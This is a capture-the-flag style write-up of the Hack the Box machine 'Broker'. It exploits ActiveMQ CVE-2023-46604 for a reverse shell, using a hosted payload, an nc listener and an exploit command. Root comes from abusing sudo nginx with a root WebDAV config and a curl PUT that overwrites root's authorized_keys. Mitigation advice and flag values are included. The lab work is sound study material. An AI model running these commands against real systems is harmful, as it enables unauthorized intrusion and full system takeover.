HTB Broker

HTB Broker is a retired easy level box on Hack the Box. Originally released 09 Nov, 2023, this box focuses on exploiting various back end web technologies both for initial access and privilege escalation.

Initial Access

Vulnerability Explanation: CVE-2023-46604

The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue.

Vulnerability Fix:

  • Please consider upgrading Apache ActiveMQ to the most recent version
  • Please consider developing IDS/IPS detections to monitor port 61616 for relevant payload signatures.

Severity: CVSS 3.1 - 10 CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H

Steps to reproduce the attack:

After the initial nmap scan, the basic auth realm "ActiveMQRealm" was used to begin research on potential vulnerabilities. CVE-2023-46604 was discovered, and a public POC for this CVE was used to gain initial access.

Service enumeration

Port       Protocol  Version                                                       Notes
22/tcp     ssh       OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp     http      nginx 1.18.0 (Ubuntu)
8161/tcp   http      Jetty 9.4.39.v20210325
61616/tcp  ActiveMQ  unknown                                                       Discovered incidentally upon exploitation

The primary nmap scan for this host was as follows:


Nmap scan report for 10.129.107.15
Host is up, received user-set (0.059s latency).
Scanned at 2024-02-27 14:25:21 EST for 11s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
|   256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial Access Method

From the initial nmap scan, the basic auth realm "ActiveMQRealm" was noted as possibly leaking information about the web application running on the host. Port 80 was browsed to manually in order to verify this, but was found to be protected by basic auth. ActiveMQ's default credential pair admin:admin was attempted and was found to authenticate successfully. This allowed visual confirmation that the host was running an Apache ActiveMQ instance:

A cursory web search was performed for "ActiveMQ vulnerability", which returned results for CVE-2023-46604. Given that the CVE was dated 2023, while the latest year in the software's copyright notice was 2020, it was presumed that the version present on the target host might be vulnerable simply due to its age.

A web search was then performed for "CVE-2023-46604 poc", which led to the discovery of a GitHub repository, which was cloned as follows:


git clone https://github.com/evkl1d/CVE-2023-46604.git

After reviewing the code for general safety, it was decided that this proof of concept would be used.

The included file poc.xml was modified as follows to return a reverse shell to the attack box's IP:

A Python web server was then started in order to deliver the XML payload:


python3 -m http.server 8080

Then a basic netcat listener was established to catch the reverse shell:


nc -lvnp 9001

Finally, the exploit code itself was executed, resulting in successful exploitation and the acquisition of a reverse shell:


python3 exploit.py -i 10.129.107.15 -u http://10.10.14.149:8080/poc.xml

Local.txt Value:

b495d2f5e6862be5bb3ae061e5e3b00b

Privilege Escalation

Vulnerability Explanation: nginx sudo arbitrary file write

With sudo privileges granted on the nginx binary, nginx can be executed from an elevated context with an arbitrary configuration file. This allows a WebDAV service to be set up that permits arbitrary file writes to any location on the filesystem. Any configuration or key file on the system can therefore be rewritten, which ultimately enables escalation of privileges.

Vulnerability Fix:

  • Please consider using wrapper scripts to restrict sudo use to only the explicit use cases that the designated user needs. E.g. if this user needs to be able to launch nginx under a particular configuration, grant the user sudo rights to a script that launches that particular configuration of nginx, and ensure that the user has no write access to the script or to the configuration file it loads.
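The wrapper-script mitigation described above, as an added example that is not part of the original writeup; the paths, the sudoers line, and the conf_is_safe and start_nginx names are assumptions made for the example:

```shell
#!/bin/sh
# Added example, not part of the original writeup: a wrapper that a sudoers
# rule points at instead of granting "sudo nginx" directly.  Hypothetical layout:
#   /usr/local/sbin/start-nginx   this script, root-owned, mode 0755
#   /etc/nginx/nginx.conf         the only configuration it will ever load
#   /etc/sudoers.d/start-nginx    <user> ALL=(root) NOPASSWD: /usr/local/sbin/start-nginx
# Command-line arguments are never consulted, so "-c /tmp/evil.conf" cannot
# be passed through sudo, and the config itself must be root-owned and
# unwritable by anyone else before nginx is started with it.

NGINX_BIN="/usr/sbin/nginx"
APPROVED_CONF="/etc/nginx/nginx.conf"

# conf_is_safe CONF APPROVED [OWNER_UID]
# Returns 0 only when CONF is exactly the approved path, a regular file (not a
# symlink), owned by OWNER_UID (root by default) and without group/other write
# bits.  Uses GNU/busybox stat -c; BSD stat needs -f instead.
conf_is_safe() {
    conf="$1"; approved="$2"; owner="${3:-0}"
    [ "$conf" = "$approved" ] || return 1
    [ -L "$conf" ] && return 1
    [ -f "$conf" ] || return 1
    uid=$(stat -c '%u' "$conf" 2>/dev/null) || return 1
    mode=$(stat -c '%a' "$conf" 2>/dev/null) || return 1
    [ "$uid" = "$owner" ] || return 1
    # the last two octal digits are group and other; 2, 3, 6, 7 carry the write bit
    case "$mode" in
        *[2367]?|*[2367]) return 1 ;;
    esac
    return 0
}

# start_nginx: validate the fixed configuration, then hand off to nginx.
# Runs as root under sudo; "$@" is deliberately ignored.
start_nginx() {
    if ! conf_is_safe "$APPROVED_CONF" "$APPROVED_CONF" 0; then
        echo "refusing to start: $APPROVED_CONF missing, symlinked, not root-owned, or writable" >&2
        return 1
    fi
    "$NGINX_BIN" -t -c "$APPROVED_CONF" || return 1   # syntax check first
    exec "$NGINX_BIN" -c "$APPROVED_CONF"
}

# In deployment the script simply ends with "start_nginx"; it is gated here on an
# environment variable so the file can also be sourced by a test harness.
if [ "${NGINX_WRAPPER_RUN:-0}" = "1" ]; then
    start_nginx
fi
```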

Severity: CRITICAL

Steps to reproduce the attack:

Upon initial access, running sudo -l during basic enumeration revealed that nginx could be run as root by the current user:

Searching for "sudo nginx privesc" eventually revealed the following blog post:

https://darrenmartynie.wordpress.com/2021/10/25/zimbra-nginx-local-root-exploit/

The payload given as an example here was modified to allow for WebDAV use of the PUT method as follows:


user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
    worker_connections 768;
}
http {
    server {
        listen 1337;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}

After this, ssh-keygen was used to create a new key pair saved at ./root with no passphrase.

curl was then used to overwrite the root user's authorized_keys file via the WebDAV configuration set up above:


curl -X PUT localhost:1337/root/.ssh/authorized_keys -d "$(cat root.pub)"

The shell was then upgraded to an interactive TTY; this was necessary in order to use SSH:


python3 -c 'import pty; pty.spawn("/bin/bash")'

Finally, SSH was accessed as the root user:


ssh -i root root@localhost

This successfully produced a root session on the host.

Post Exploitation

Proof.txt Value:

42d367b6909f8db1c33989041d5b334c